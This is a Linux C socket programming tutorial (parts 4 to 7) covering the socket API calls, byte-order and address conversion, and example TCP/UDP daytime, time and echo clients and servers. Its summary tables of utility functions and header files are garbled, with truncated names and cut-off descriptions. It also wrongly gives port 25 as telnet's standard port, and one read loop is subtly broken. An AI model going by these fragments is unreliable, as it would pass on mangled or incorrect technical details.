NAME socket() - create an endpoint for communication SYNOPSIS #include <sys/types.h> #include <sys/socket.h> int socket(int domain, int type, int protocol); domain should be set to "AF_INET", just like in the struct sockaddr_in. The type argument tells the kernel what kind of socket this is. For example SOCK_STREAM or SOCK_DGRAM. Just set protocol to "0" to have socket() choose the correct protocol based on the type. protocol is frequently 0 if only one protocol in the family supports the specified type. You can look at /etc/protocols. There are many more domains and types that you will find later on. Also, theres a "better" way to get the protocol. See the getprotobyname() man page. socket() simply returns to you an integer of the socket descriptor that you can use in later system calls, or -1 on error. The global variable errno is set to the errors value (see the perror() man page). In some documentation, youll see the mentioning of a mystical "PF_INET. Once a long time ago, it was thought that maybe an address family (what the "AF" in "AF_INET" stands for) might support several protocols that were referenced by their protocol family (what the "PF" in "PF_INET" stands for). That didnt happen. So the correct thing to do is to use AF_INET in your struct sockaddr_in and PF_INET in your call to socket(). But practically speaking, you can use AF_INET everywhere.

NETWORK PROGRAMMING LINUX SOCKET PART 4: THE APPLICATION PROGRAMMING INTERFACES (APIs)
Note: Program examples if any, compiled using gcc on Linux Fedora Core 3 machine with several update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and theSELinux set to default configuration. listen() NAME listen() - listen for connections on a socket SYNOPSIS

#include <sys/socket.h> int listen(int sockfd, int backlog); sockfd is the usual socket file descriptor from the socket() system call. backlog is the number of connections allowed on the incoming queue. As an example, for the server, if you want to wait for incoming connections and handle them in some way, the steps are: first you listen(), then you accept(). The incoming connections are going to wait in this queue until you accept() (explained later) them and this is the limit on how many can queue up. Again, as per usual, listen() returns -1 and sets errno on error. We need to call bind() before we call listen() or the kernel will have us listening on a random port. So if youre going to be listening for incoming connections, the sequence of system calls youll make is something like this: socket(); bind(); listen(); /* accept() goes here */ accept() NAME accept() - accept a connection on a socket SYNOPSIS #include <sys/types.h> #include <sys/socket.h> int accept(int sockfd, struct sockaddr *addr, int *addrlen);

sockfd is the listen()ing socket descriptor. addr will usually be a pointer to a local struct sockaddr_in. This is where the information about the incoming connection will go (and with it you can determine which host is calling you from which port). addrlen is a local integer variable that should be set to sizeof(struct sockaddr_in) before its address is passed to accept(). accept() will not put more than that many bytes into addr. If it puts fewer in, itll change the value of addrlen to reflect that. accept() returns -1 and sets errno if an error occurs. Basically, after listen(), a server calls accept() to wait for the next client to connect. accept() will create a new socket to be used for I/O with the new client. The server then will continue to do further accepts with the original sockfd. When someone try to connect() to your machine on a port that you are listen()ing on, their connection will be queued up waiting to be accepted. You call accept() and you tell it to get the pending connection. Itll return to you a new socket file descriptor to use for this single connection. Then, you will have two socket file descriptors where the original one is still listening on your port and the newly created one is finally ready to send() and recv(). The following is a program example that demonstrates the use of the previous functions.

[bodo@bakawali testsocket]$ cat test3.c #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> /* the port users will be connecting to */ #define MYPORT 3440 /* how many pending connections queue will hold */ #define BACKLOG 10 int main() { /* listen on sock_fd, new connection on new_fd */ int sockfd, new_fd; /* my address information, address where I run this program */ struct sockaddr_in my_addr; /* remote address information */ struct sockaddr_in their_addr; int sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); if(sockfd == -1) { perror("socket() error lol!"); exit(1); } else printf("socket() is OK...\n"); /* host byte order */ my_addr.sin_family = AF_INET; /* short, network byte order */ my_addr.sin_port = htons(MYPORT); /* auto-fill with my IP */ my_addr.sin_addr.s_addr = INADDR_ANY; /* zero the rest of the struct */ memset(&(my_addr.sin_zero), 0, 8); if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("bind() error lol!"); exit(1); } else printf("bind() is OK...\n");

if(listen(sockfd, BACKLOG) == -1) { perror("listen() error lol!"); exit(1); } else printf("listen() is OK...\n"); /* ...other codes to read the received data... */ sin_size = sizeof(struct sockaddr_in); new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size); if(new_fd == -1) perror("accept() error lol!"); else printf("accept() is OK...\n"); /*.....other codes.......*/ close(new_fd); close(sockfd); return 0; } [bodo@bakawali testsocket]$ gcc test3.c -o test3 [bodo@bakawali testsocket]$ ./test3 socket() is OK... bind() is OK... listen() is OK... Note that we will use the socket descriptor new_fd for all send() and recv() calls. If youre only getting one single connection ever, you can close() the listening sockfd in order to prevent more incoming connections on the same port, if you so desire. send() int send(int sockfd, const void *msg, int len, int flags); sockfd is the socket descriptor you want to send data to (whether its the one returned by socket() or the new one you got with accept()). msg is a pointer to the data you want to send. len is the length of that data in bytes. Just set flags to 0. (See the send() man page for more information concerning flags). Some sample code might be: char *msg = "I was here!"; int len, bytes_sent;

... ... len = strlen(msg); bytes_sent = send(sockfd, msg, len, 0); ...

send() returns the number of bytes actually sent out and this might be less than the number you told it to send. Sometimes you tell it to send a whole gob of data and it just cant handle it. Itll fire off as much of the data as it can, and trust you to send the rest later. Remember, if the value returned by send() doesnt match the value in len, its up to you to send the rest of the string. If the packet is small (less than 1K or so) it will probably manage to send the whole thing all in one go. Again, -1 is returned on error, and errno is set to the error number.

recv()
The recv() call is similar in many respects: int recv(int sockfd, void *buf, int len, unsigned int flags);

sockfd is the socket descriptor to read from, buf is the buffer to read the information into and len is the maximum length of the buffer. flags can again be set to 0. See the recv() man page for flag information. recv() returns the number of bytes actually read into the buffer, or -1 on error (with errno set, accordingly). If recv() return 0, this can mean only one thing that is the remote side has closed the connection on you. A return value of 0 is recv()s way of letting you know this has occurred. At this stage you can now pass data back and forth on stream sockets. These two functions send() and recv() are for communicating over stream sockets or connected datagram sockets. If you want to use regular unconnected datagram sockets (UDP), you need to use the sendto() and recvfrom(). Or you can use more general, the normal file system functions, write() and read(). write() NAME write() - write to a file descriptor SYNOPSIS #include <unistd.h> ssize_t write(int fd, const void *buf, size_t count);

Writes to files, devices, sockets etc. Normally data is copied to a system buffer and write occurs asynchronously. If buffers are full, write can block.

read() NAME read() - read from a file descriptor SYNOPSIS

#include <unistd.h> ssize_t read(int fd, void *buf, size_t count); Reads from files, devices, sockets etc. If a socket has data available up to count bytes are read. If no data is available, the read blocks. If less than count bytes are available, read returns what it can without blocking. For UDP, data is read in whole or partial datagrams. If you read part of a datagram, the rest is discarded. close() and shutdown() NAME close() - close a file descriptor SYNOPSIS #include <unistd.h> int close(int sockfd);
You can just use the regular UNIX file descriptor close() function: close(sockfd);

int

This will prevent any more reads and writes to the socket. Anyone attempting to read or write the socket on the remote end will receive an error. UNIX keeps a count of the number of uses for an open file or device. Close decrements the use count. If the use count reaches 0, it is closed. Just in case you want a little more control over how the socket closes, you can use the shutdown() function. It allows you to cut off communication in a certain direction, or both ways just like close() does. The prototype: shutdown(int sockfd, int how); sockfd is the socket file descriptor you want to shutdown, and how is one of the following: 1. 0 Further receives are disallowed. 2. 1 Further sends are disallowed. 3. 2 Further sends and receives are disallowed (like close()). shutdown() returns 0 on success, and -1 on error (with errno set accordingly). If you deign to use shutdown() on unconnected datagram sockets, it will simply make the socket unavailable for further send() and recv() calls (remember that you can use these if you connect() your datagram socket). Its important to note that shutdown() doesnt actually close the file descriptor, it just change its usability. To free a socket descriptor, you need to use close().

NETWORK PROGRAMMING LINUX SOCKET PART 5: APIs & HEADER FILES


sendto() and recvfrom() for DATAGRAM (UDP)

Since datagram sockets arent connected to a remote host, we need to give the destination address before we send a packet. The prototype is: int sendto(int sockfd, const void *msg, int len, unsigned int flags, const struct sockaddr *to, int tolen);

This call is basically the same as the call to send() with the addition of two other pieces of information. to is a pointer to a struct sockaddr (which youll probably have as a struct sockaddr_in and cast it at the last minute) which contains the destination IP address and port. tolen can simply be set to sizeof(struct sockaddr). Just like with send(), sendto() returns the number of bytes actually sent (which, again, might be less than the number of bytes you told it to send!), or -1 on error. Equally similar are recv() and recvfrom(). The prototype of recvfrom() is: int recvfrom(int sockfd, void *buf, int len, unsigned int flags, struct sockaddr *from, int *fromlen); Again, this is just like recv() with the addition of a couple fields. from is a pointer to a local struct sockaddr that will be filled with the IP address and port of the originating machine. fromlen is a pointer to a local int that should be initialized to sizeof(struct sockaddr). When the function returns, fromlen will contain the length of the address actually stored in from. recvfrom() returns the number of bytes received, or -1 on error (with errno set accordingly). Remember, if you connect() a datagram socket, you can then simply use send() and recv() for all your transactions. The socket itself is still a datagram socket and the packets still use UDP, but the socket interface will automatically add the destination and source information for you. A sample of the client socket call flow socket() connect() while (x) { write() read() } close() A sample of the server socket call flow socket() bind() listen() while (1) { accept() while (x)

{ read() write() } close() } close() Network Integers versus Host Integers Little Endian and big Endian issue regarding the use of the different processor architectures. Usually integers are either most-significant byte first or least-significant byte first. On Intel based machines the hex value 0x01020304 would be stored in 4 successive bytes as: 04, 03, 02, 01. This is a little endian.

On an Most Significant Bit (MSB)-first (big endian) machine (IBM RS6000), this would be: 01, 02, 03, 04. It is important to use network byte order (MSB-first) and the conversion functions available for this task are listed below: htons() Host to network short. ntohs() Network to host short. htonl() Host to network long. ntohl() Network to host long.

Table 7 Use these functions to write portable network code. Fortunately for you, there are a bunch of functions that allow you to manipulate IP addresses. No need to figure them out by hand and stuff them in a long with the operator. First, lets say you have a: struct sockaddr_in ina And you have an IP address "10.12.110.57" that you want to store into it. The function you want to use, inet_addr(), converts an IP address in numbersand-dots notation into an unsigned long. The assignment can be made as follows: ina.sin_addr.s_addr = inet_addr("10.12.110.57"); Notice that inet_addr() returns the address in Network Byte Order already so you dont have to call htonl(). Now, the above code snippet isnt very robust because there is no error checking. inet_addr() returns -1 on error. For binary numbers (unsigned)-1 just happens to correspond to the IP address 255.255.255.255! Thats the broadcast address! Remember to do your error checking properly. Actually, theres a cleaner interface you can use instead of inet_addr(): its called inet_aton() ("aton" means "ascii to network"): #include <sys/socket.h>

#include <netinet/in.h> #include <arpa/inet.h> int inet_aton(const char *cp, struct in_addr *inp);
And heres a sample usage, while packing a struct sockaddr_in is shown below: struct sockaddr_in my_addr; /* host byte order */ my_addr.sin_family = AF_INET; /* short, network byte order */ my_addr.sin_port = htons(MYPORT); inet_aton("10.12.110.57", &(my_addr.sin_addr)); /* zero the rest of the struct */ memset(&(my_addr.sin_zero), 0, 8);

inet_aton(), unlike practically every other socket-related function, returns nonzero on success, and zero on failure. And the address is passed back in inp. Unfortunately, not all platforms implement inet_aton() so, although its use is preferred, normally the older more common inet_addr() is used. All right, now you can convert string IP addresses to their binary representations. What about the other way around? What if you have a struct in_addr and you want to print it in numbers-and-dots notation? In this case, youll want to use the function inet_ntoa() ("ntoa" means "network to ascii") something like this: printf("%s", inet_ntoa(ina.sin_addr)); That will print the IP address. Note that inet_ntoa() takes a struct in_addr as an argument, not a long. Also notice that it returns a pointer to a char. This points to a statically stored char array within inet_ntoa() so that each time you call inet_ntoa() it will overwrite the last IP address you asked for. For example: char *a1, *a2; ... ... a1 = inet_ntoa(ina1.sin_addr); /* this is 192.168.4.1 */ a2 = inet_ntoa(ina2.sin_addr); /* this is 10.11.110.55 */ printf("address 1: %s\n", a1); printf("address 2: %s\n", a2);
Will print: address 1: 10.11.110.55 address 2: 10.11.110.55

If you need to save the address, strcpy() it to your own character array.

---------------------------------------------------SOME SUMMARY--------------------------------------------Let see, what we have covered till now. Socket Library Functions System calls:

1. 2. 3. 4.

Startup / close. Data transfer. Options control. Other.

Network configuration lookup: 1. Host address. 2. Ports for services. 3. Other. Utility functions: 1. Data conversion. 2. Address manipulation. 3. Error handling.

Primary Socket Calls socket() bind() listen() accept() connect() recv() send() read() write() close() shutdown() Create a new socket and return its descriptor. Associate a socket with a port and address. Establish queue for connection requests. Accept a connection request. Initiate a connection to a remote host. Receive data from a socket descriptor. Send data to a socket descriptor. Reads from files, devices, sockets etc. Writes to files, devices, sockets etc. One-way close of a socket descriptor. Allows you to cut off communication in a certain direction, or both ways just like close() does.

Table 8 Network Database Administration functions gethostbyname() - given a hostname, returns a structure which specifies its DNS name(s) and IP address (es). getservbyname() - given service name and protocol, returns a structure which specifies its name(s) and its port address. gethostname() - returns hostname of local host. getservbyname(), getservbyport(), getservent(). getprotobyname(), getprotobynumber(), getprotobyent(), getnetbyname(), getnetbyaddr(), getnetent(). Socket Utility Functions Convert short/long from network byte order (big endian) to host byte order. Convert short/long from host byte order to network byte order. Convert 32-bit IP address (network byte order to/from a dotted decimal string). Print error message (based on errno) to stderr. Print error message for gethostbyname() to stderr (used with DNS).

s()/ntohl() s()/htonl() _ntoa()/inet_addr() or() or()

Table 9 Primary Header Files Include file sequence may affect processing (order is important!). Other header files that define macro, data type, structure and functions are given in the summary Table at the end of this Tutorial. <sys/types.h> Prerequisite typedefs. <errno.h> Names for errno values (error numbers). <sys/socket.h> struct sockaddr; system prototypes and constants. <netdb.h.h> Network info lookup prototypes and structures. <netinet/in.h> struct sockaddr_in; byte ordering macros. <arpa/inet.h> Utility function prototypes. Table 10 Ancillary Socket Topics UDP versus TCP. Controlling/managing socket characteristics. 1. get/setsockopt() - keepalive, reuse, nodelay. 2. fcntl() - async signals, blocking. 3. ioctl() - file, socket, routing, interface options. Blocking versus Non-blocking socket. Signal based socket programming (SIGIO). Implementation specific functions. Socket header files Programs that use the socket functions must include one or more header files that contain information that is needed by the functions, such as: 1. Macro definitions. 2. Data type definitions. 3. Structure definitions. 4. Function prototypes.

name

>

ser.h>

>

The following Table is a summary of the header files used in conjunction with the socket APIs. However, different kernel version will have slightly different header files and the path as well. Please refer to the online Linux source code repository for the desired kernel version. Description Defines prototypes for those network library routines that convert Internet address and dotted-decimal notat example,inet_makeaddr(). Defines Internet name server macros and structures that are needed when the system uses the resolver ro Defines macros and variables for error reporting. Defines prototypes, macros, variables, and structures for control-type functions, for example, fcntl(). Defines prototypes, macros, variables, and the ifreq and ifconf structures that are associated with ioctl() req affect interfaces. Defines prototypes, macros, variables, and the rtentry and rtconf structures that are associated with ioctl() r

affect routing entries. Contains data definitions for the network library routines. Defines the following structures: hostent and hostent_data. netent and netent_data. servent and servent_data. protoent and protoent_data. > Defines prototypes, macros, variables, and the sockaddr_in structure to use with Internet domain sockets. > Defines macros, variables, and structures that are associated with setting IP options. cmp.h> Defines macros, variables, and structures that are associated with the Internet Control Message Protocol (IC h> Defines macros, variables, and structures that are associated with setting TCP options. > Defines IPX packet header. May be needed in AF_NS socket applications. > Defines ioctl structures for IPX ioctl() requests. May be needed in AF_NS socket applications. Defines AF_NS socket structures and options. You must include this file in AF_NS socket applications. Defines SPX packet header. May be needed in AF_NS socket applications. Defines sockaddr_tel structure and related structures and macros. You must include this file in AF_TELEPH applications. Contains macros and structures that are used by the resolver routines. Defines Secure Sockets Layer (SSL) prototypes, macros, variables, and the following structures: SSLInit SSLHandle Defines prototypes, macros, variables, and structures for I/O control-type functions, for example, ioctl(). h> Defines some limits to system fields, in addition to miscellaneous macros and prototypes. > Defines additional macros, types, structures, and functions that are used by signal routines. Defines socket prototypes, macros, variables, and the following structures: sockaddr h> msghdr linger You must include this file in all socket applications. Defines prototypes, macros, variables, and structures that are associated with time functions. Defines various data types. Also includes prototypes, macros, variables, and structures that are associated > the select()function. You must include this file in all socket applications. Defines prototypes, macros, variables, and structures that are associated with I/O functions. Defines prototypes, macros, variables, and the sockaddr_un structure to use with UNIX domain sockets. Contains macros and structures that are defined by the integrated file system. Needed when the system us the read()and write() system functions. Table 11: Header files for Linux sockets APIs

NETWORK PROGRAMMING LINUX SOCKET PART 6: THE APIs


This is a continuation from Part I series, Introduction to Socket Programming. Working program examples if any compiled using gcc, tested using the public IPs, run on Linux/Fedora Core 3, with several times of update, as normal user. The Fedora

machine used for the testing having the "No Stack Execute" disabled and the SELinux set to default configuration. The abilities that supposed to be acquired: Able to understand and use the Unix / Linux C language socket APIs. Able to understand and implement several simple TCP and UDP Client and server basic designs. Client Design Consideration Some of the information in this section is a repetition from the previous one. Identifying a Server's Address A server's IP address must be used in connect. Usually the name is used to get the address. The name could be in the code mailhost for an email program. The user could specify the name common because it is flexible and simple. The name or address could be in a file. Can broadcast on the network to ask for a server. The following is an example of telneting the telserv.test.com server through the standard telnet port 25: telnet telserv.test.com Or using the IP address of the telnet server: telnet 131.95.115.204 Client software typically allows either names or numbers. Ports usually have a default value in the code if not explicitly mentioned. Looking Up a Computer Name NAME gethostbyname() - get network host entry SYNOPSIS #include <netdb.h> extern int h_errno; struct hostent *gethostbyname(const char *name); struct hostent { char *h_name; char **h_aliases; int h_addrtype; int h_length; char **h_addr_list; }; #define h_addr h_addr_list[0] name could be a name or dotted decimal address. Hosts can have many names in h_aliases. Hosts can have many addresses in h_addr_list. Addresses in h_addr_list are not strings network order addresses ready to copy and use. Looking Up a Port Number by Name NAME

getservbyname() - get service entry SYNOPSIS #include <netdb.h> struct servent *getservbyname(const char *name, const char *proto); struct servent { char *s_name; char **s_aliases; int s_port; char *s_proto; }
s_port: port number for the service given in network byte order. Looking Up a Protocol by Name NAME getprotobyname() - get protocol entry SYNOPSIS #include <netdb.h> struct protoent *getprotobyname(const char *name); struct protoent { char *p_name; char **p_aliases; int p_proto; }

p_proto: the protocol number (can be used in socket call). getpeername() The function getpeername() will tell you who is at the other end of a connected stream socket. The prototype: #include <sys/socket.h> int getpeername(int sockfd, struct sockaddr *addr, int *addrlen); sockfd is the descriptor of the connected stream socket. addr is a pointer to a struct sockaddr (or a struct sockaddr_in) that will hold the information about the other side of the connection. addrlen is a pointer to an int, which should be initialized to sizeof(struct sockaddr). The function returns -1 on error and sets errno accordingly. Once you have their address, you can use inet_ntoa() or gethostbyaddr() to print or get more information. Allocating a Socket #include <sys/types.h> #include <sys/socket.h> int s; s = socket(PF_INET, SOCK_STREAM, 0);

Specifying PF_INET and SOCK_STREAM leaves the protocol parameter irrelevant. Choosing a Local Port Number The server will be using a well-known port. Once a client port is set, the server will be aware as needed. You could bind to a random port above 1023. A simpler choice is to leave out the bind call. connect() will choose a local port if required. Connecting to a Server with TCP connect(). NAME connect - initiate a connection on a socket SYNOPSIS #include <sys/types.h> #include <sys/socket.h> int connect(int s, struct sockaddr *serv_addr, int addrlen); RETURN VALUE If the connection or binding succeeds, zero is returned. On error, -1 is returned, and errno is set appropriately. We will use a sockaddr_in structure (possibly cast). After connect, s is available to read/write. Communicating with TCP Code segment example: char *req = "send cash"; char buf[100], *b; write (s, req, strlen(req)); left = 100; b = buf; while (left && (n = read(s, buf, left)) > 0) { b += n; left -= n; } The client and server can not know how many bytes are sent in each write. Delivered chunks are not always the same size as in the original write. Reads must be handled in a loop to cope with stream sockets. Closing a TCP Connection In the simplest case close works well. Sometimes it is important to tell the server that a client will send no more requests, while still keeping the socket available for reading. res = shutdown(s, 1);

The 1 means no more writes will happen. The server detects end of file on the socket. After the server sends all the replies it can close.

Connected vs Unconnected UDP Sockets A client can call connect with a UDP socket or not. If connect is called read and write will work. Without connect the client needs to send with a system call specifying a remote endpoint. Without connect it might be useful to receive data with a system call which tells the remote endpoint. Connect with TCP involves a special message exchange sequence. Connect with UDP sends no messages. You can connect to non-existent servers. Communicating with UDP UDP data is always a complete message (datagram). Whatever is specified in a write becomes a datagram. Receiver receives the complete datagram unless fewer bytes are read. Reading in a loop for a single datagram is pointless with UDP. close() is adequate, since shutdown() does not send any messages. UDP is unreliable. UDP software needs an error protocol.
Client Example Some variations

A Simple Client Library To make a connection, a client must: 1. select UDP or TCP... 2. determine a server's IP address... 3. determine the proper port... 4. make the socket call... 5. make the connect call... Frequently the calls are essentially the same. A library offers normal capability with a simple interface.
connectTCP()
The following is a code segment example using the connectTCP() function. int connectTCP(const char *host, const char *service) { return connectsock(host, service, "tcp"); }

connectUDP()

The following is a code segment example using the connectUDP() function. int connectUDP(const char *host, const char *service) { return connectsock(host, service, "udp"); }
connectsock()
The following is a code segment example using the connectsock() function. int connectsock(const char *host, const char *service, const char *transport) {

struct hostent *phe; /* pointer to host information entry */ struct servent *pse; /* pointer to service information entry */ struct protoent *ppe; /* pointer to protocol information entry*/ struct sockaddr_in sin; /* an Internet endpoint address */ int s, type; /* socket descriptor and socket type */ memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; /* Map service name to port number */ if(pse = getservbyname(service, transport)) sin.sin_port = pse->s_port; else if ((sin.sin_port = htons((u_ short)atoi(service))) == 0) errexit("can't get \"%s\" service entry\n", service); /* Map host name to IP address, allowing for dotted decimal */ if(phe = gethostbyname(host)) memcpy(&sin.sin_addr, phe->h_addr, phe->h_length); else if ((sin.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) errexit("can't get \"%s\" host entry\n", host); /* Map transport protocol name to protocol number */ if((ppe = getprotobyname(transport)) == 0) errexit("can't get \"%s\" protocol entry\n", transport); /* Use protocol to choose a socket type */ if(strcmp(transport, "udp") == 0) type = SOCK_DGRAM; else type = SOCK_STREAM; /* Allocate a socket */ s = socket(PF_INET, type, ppe->p_proto); if(s < 0) errexit("can't create socket: %s\n", strerror(errno)); /* Connect the socket */ if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) errexit("can't connect to %s.%s: %s\n", host, service, strerror(errno)); return s; }
A TCP DAYTIME Client

DAYTIME service prints date and time. TCP version sends upon connection. Server reads no client data.

UDP version sends upon receiving any message. The following is a code segment example implementing the TCP Daytime. #define LINELEN 128 int main(int argc, char *argv[ ]) { /* host to use if none supplied */ char *host = "localhost"; /* default service port */ char *service = "daytime"; switch (argc) { case 1: host = "localhost"; break; case 3: service = argv[2]; /* FALL THROUGH */ case 2: host = argv[1]; break; default: fprintf(stderr, "usage: TCPdaytime [host [port]]\n"); exit(1); } TCPdaytime(host, service); exit(0); } void TCPdaytime(const char *host, const char *service) { /* buffer for one line of text */ char buf[LINELEN+1]; /* socket, read count */ int s, n; s = connectTCP(host, service); while((n = read(s, buf, LINELEN)) > 0) { /* ensure null-terminated */ buf[n] = '\0'; (void) fputs(buf, stdout); } }
A UDP TIME Client

The TIME service is for computers. Returns seconds since 1-1-1900. Useful for synchronizing and time-setting. TCP and UDP versions return time as an integer. Need to use ntohl to convert.

The following is a code segment example implementing UDP Time. #define MSG "What time is it?\n" int main(int argc, char *argv[ ]) { char *host = "localhost"; /* host to use if none supplied */ char *service = "time"; /* default service name */ time_t now; /* 32-bit integer to hold time */ int s, n; /* socket descriptor, read count */ switch (argc) { case 1: host = "localhost"; break; case 3: service = argv[2]; /* FALL THROUGH */ case 2: host = argv[1]; break; default: fprintf(stderr, "usage: UDPtime [host [port]]\n"); exit(1); } s = connectUDP(host, service); (void) write(s, MSG, strlen(MSG)); /* Read the time */ n = read(s, (char *)&now, sizeof(now)); if(n < 0) errexit("read failed: %s\n", strerror(errno)); /* put in host byte order */ now = ntohl((u_long)now); printf("%s", ctime(&now)); exit(0); }
TCP and UDP Echo Clients

main() is like the other clients.

TCPecho() function
The following is a code segment example for using the TCPecho() function. int TCPecho(const char *host, const char *service) { char buf[LINELEN+1]; /* buffer for one line of text */ int s, n; /* socket descriptor, read count*/ int outchars, inchars; /* characters sent and received */

s = connectTCP(host, service); while(fgets(buf, sizeof(buf), stdin)) { /* insure line null-terminated */ buf[LINELEN] = '\0'; outchars = strlen(buf); (void) write(s, buf, outchars); /* read it back */ for(inchars = 0; inchars < outchars; inchars+=n) { n = read(s, &buf[inchars], outchars - inchars); if(n < 0) errexit("socket read failed: %s\n", strerror(errno)); } fputs(buf, stdout); } }

NETWORK PROGRAMMING LINUX SOCKET PART 7 - CODE SNIPPET EXAMPLES


Iterative, Connectionless Servers (UDP) Creating a Passive UDP Socket The following is a sample codes for a passive UDP socket. int passiveUDP(const char *service) { return passivesock(service, "udp", 0); } u_short portbase = 0; int passivesock(const char *service, const char *transport, int qlen) { struct servent *pse; struct protoent *ppe; struct sockaddr_in sin; int s, type; memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; /* Map service name to port number */ if(pse = getservbyname(service, transport)) sin.sin_port = htons(ntohs((u_short)pse->s_port) + portbase);

else if((sin.sin_port = htons((u_short)atoi(service))) == 0) errexit("can't get \"%s\" service entry\n", service); /* Map protocol name to protocol number */ if((ppe = getprotobyname(transport)) == 0) errexit("can't get \"%s\" protocol entry\n", transport); /* Use protocol to choose a socket type */ if(strcmp(transport, "udp") == 0) type = SOCK_DGRAM; else type = SOCK_STREAM; /* Allocate a socket */ s = socket(PF_INET, type, ppe->p_proto); if(s < 0) errexit("can't create socket: %s\n", strerror(errno)); /* Bind the socket */ if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) errexit("can't bind to %s port: %s\n", service, strerror(errno)); if(type == SOCK_STREAM && listen(s, qlen) < 0) errexit("can't listen on %s port: %s\n", service, strerror(errno)); return s; } A TIME Server The following is a sample codes for Time server. /* main() - Iterative UDP server for TIME service */ int main(int argc, char *argv[ ]) { struct sockaddr_in fsin; char *service = "time"; char buf[1]; int sock; time_t now; int alen; sock = passiveUDP(service); while (1) { alen = sizeof(fsin); if(recvfrom(sock, buf, sizeof(buf), 0, (struct sockaddr *)&fsin, &alen) < 0) errexit("recvfrom: %s\n", strerror(errno)); time(&now); now = htonl((u_long)now); sendto(sock, (char *)&now, sizeof(now), 0, (struct sockaddr *)&fsin, sizeof(fsin)); } }

Iterative, Connection-Oriented Servers (TCP) A DAYTIME Server The following is a sample codes for Daytime server. int passiveTCP(const char *service, int qlen) { return passivesock(service, "tcp", qlen); } int main(int argc, char *argv[ ]) { struct sockaddr_in fsin; char *service = "daytime"; int msock, ssock; int alen; msock = passiveTCP(service, 5); while (1) { ssock = accept(msock, (struct sockaddr *)&fsin, &alen); if(ssock < 0) errexit("accept failed: %s\n", strerror(errno)); TCPdaytimed(ssock); close(ssock); } } void TCPdaytimed(int fd) { char *pts; time_t now; char *ctime(); time(&now); pts = ctime(&now); write(fd, pts, strlen(pts)); return; } Close call requests a graceful shutdown. Data in transit is reliably delivered. Close requires messages and time. If the server closes you may be safe. If the client must close, the client may not cooperate. In our simple server, a client can make rapid calls and use resources associated with TCP shutdown timeout. Concurrent, Connection-Oriented Servers (TCP) The Value of Concurrency An iterative server may block for excessive time periods. An example is an echo server. A client could send many megabytes blocking other clients for substantial periods.

A concurrent echo server could handle multiple clients simultaneously. Abusive clients would not affect polite clients as much. A Concurrent Echo Server Using fork() The following is a sample codes for concurrent Echo server using fork(). int main(int argc, char *argv[ ]) { char *service = "echo"; /* service name or port number */ struct sockaddr_in fsin; /* the address of a client */ int alen; /* length of client's address */ int msock; /* master server socket */ int ssock; /* slave server socket */ msock = passiveTCP(service, QLEN); signal(SIGCHLD, reaper); while (1) { alen = sizeof(fsin); ssock = accept(msock, (struct sockaddr *)&fsin, &alen); if(ssock < 0) { if(errno == EINTR) continue; errexit("accept: %s\n", strerror(errno)); } switch (fork()) { /* child */ case 0: close(msock); exit(TCPechod(ssock)); /* parent */ default: close(ssock); break; case -1: errexit("fork: %s\n", strerror(errno)); } } } int TCPechod(int fd) { char buf[BUFSIZ]; int cc; while (cc = read(fd, buf, sizeof buf)) { if(cc < 0) errexit("echo read: %s\n", strerror(errno)); if(write(fd, buf, cc) < 0) errexit("echo write: %s\n", strerror(errno));

} return 0; } void reaper(int sig) { int status; while (wait3(&status, WNOHANG, (struct rusage *)0) >= 0) /* empty ;*/ } Single-Process, Concurrent Servers (TCP) Data-driven Processing Arrival of data triggers processing. A message is typically a request. Server replies and awaits additional requests. If processing time is small, the requests may be possible to handle sequentially. Timesharing would be necessary only when the processing load is too high for sequential processing. Timesharing with multiple slaves is easier. Using Select for Data-driven Processing A process calls select to wait for one (or more) of a collection of open files (or sockets) to be ready for I/O. int select(int n, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, struct timeval *timeout); FD_CLR(int fd, fd_set *set); FD_ISSET(int fd, fd_set *set); FD_SET(int fd, fd_set *set); FD_ZERO(fd_set *set); select() returns the number of fd's ready for I/O. FD_ISSET is used to determine which fd's are ready. select() returns 0 if the timer expires. select() returns -1 if there is an error. An ECHO Server using a Single Process The following is a sample codes for Echo server using a single process. int main(int argc, char *argv[ ]) { char *service = "echo"; struct sockaddr_in fsin; int msock; fd_set rfds; fd_set afds; int alen; int fd, nfds; msock = passiveTCP(service, QLEN); nfds = getdtablesize();

FD_ZERO(&afds); FD_SET(msock, &afds); while (1) { memcpy(&rfds, &afds, sizeof(rfds)); if(select(nfds, &rfds, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) errexit("select: %s\n", strerror(errno)); if(FD_ISSET(msock, &rfds)) { int ssock; alen = sizeof(fsin); ssock = accept(msock, (struct sockaddr *)&fsin, &alen); if(ssock < 0) errexit("accept: %s\n", strerror(errno)); FD_SET(ssock, &afds); } for(fd=0; fd < nfds; ++fd) if(fd != msock && FD_ISSET(fd, &rfds)) if(echo(fd) == 0) { (void) close(fd); FD_CLR(fd, &afds); } } } int echo(int fd) { char buf[BUFSIZ]; int cc; cc = read(fd, buf, sizeof buf); if(cc < 0) errexit("echo read: %s\n", strerror(errno)); if(cc && write(fd, buf, cc) < 0) errexit("echo write: %s\n", strerror(errno)); return cc; } Multiprotocol Servers Why use multiple protocols in a server? Using separate UDP and TCP servers gives the system administrator more flexibility. Using separate servers result in 2 moderately simple servers. Using one server eliminates duplicate code simplifying software maintenance. Using one server reduces the number of active processes. A Multiprotocol DAYTIME Server The following is a sample codes for Multiprotocol Daytime server. int main(int argc, char *argv[])

